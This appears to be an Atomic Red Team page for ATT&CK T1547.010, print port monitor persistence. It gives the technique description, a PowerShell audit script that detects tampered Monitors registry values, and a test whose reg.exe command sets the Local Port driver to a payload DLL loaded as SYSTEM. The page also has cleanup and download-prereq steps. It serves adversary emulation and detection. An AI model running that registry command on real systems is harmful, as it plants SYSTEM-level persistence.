
Port Monitors

Description from ATT&CK

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
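The following audit script is an added example, not part of the ATT&CK description or the Atomic Red Team test: it enumerates each subkey under the Monitors key and flags a Driver value that is a fully-qualified path rather than a bare System32 file name, that points to a missing file, that deviates from the stock default for the four built-in monitors listed above (the baseline names are assumed defaults for a plain Windows install), or whose file fails Authenticode validation. Run it elevated on the host you are checking.

```powershell
# Added example: audit print port monitor Driver values for the persistence
# described above. Baseline DLL names are assumed stock Windows defaults;
# third-party print software may legitimately add further monitors.
$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$Baseline = @{
    'Local Port'           = 'localspl.dll'
    'Standard TCP/IP Port' = 'tcpmon.dll'
    'USB Monitor'          = 'usbmon.dll'
    'WSD Port'             = 'WSDMon.dll'
}
$System32 = Join-Path $env:SystemRoot 'System32'

function Get-PortMonitorFinding {
    foreach ($sub in Get-ChildItem -Path $MonitorsKey -ErrorAction Stop) {
        $name    = $sub.PSChildName
        $driver  = (Get-ItemProperty -Path $sub.PSPath -ErrorAction SilentlyContinue).Driver
        $reasons = @()

        if ([string]::IsNullOrEmpty($driver)) {
            $reasons += 'no Driver value'
        } else {
            # A bare file name is loaded from System32; a path with separators is the
            # fully-qualified variant from the description and is rarely legitimate.
            $isPath = $driver -match '[\\/]'
            $full   = if ($isPath) { $driver } else { Join-Path $System32 $driver }
            if ($isPath) { $reasons += 'Driver is a full path, not a System32 file name' }
            if (-not $Baseline.ContainsKey($name)) {
                $reasons += 'monitor not in baseline'
            } elseif ($Baseline[$name] -ine $driver) {
                $reasons += "expected $($Baseline[$name]) for '$name'"
            }
            if (Test-Path -LiteralPath $full) {
                # spoolsv.exe runs as SYSTEM, so an unsigned or tampered DLL here is high risk
                $sig = Get-AuthenticodeSignature -FilePath $full
                if ($sig.Status -ne 'Valid') { $reasons += "signature status: $($sig.Status)" }
            } else {
                $reasons += "file not found: $full"
            }
        }
        [pscustomobject]@{
            Monitor    = $name
            Driver     = $driver
            Suspicious = ($reasons.Count -gt 0)
            Reasons    = ($reasons -join '; ')
        }
    }
}

Get-PortMonitorFinding | Format-Table -AutoSize
```

After the atomic test below has run, the Local Port entry is reported with a full-path Driver and a baseline mismatch; after the cleanup command it reports clean again.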

Atomic Tests

Atomic Test #1 - Change Windows Default Print Monitor

Register a malicious DLL as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.

Supported Platforms: windows

auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26


| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1547.010\src\x64\T1547.dll |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d #{dll_payload} /f

Cleanup Commands:

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f

Dependencies: Run with powershell!

Description: T1547.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{dll_payload}"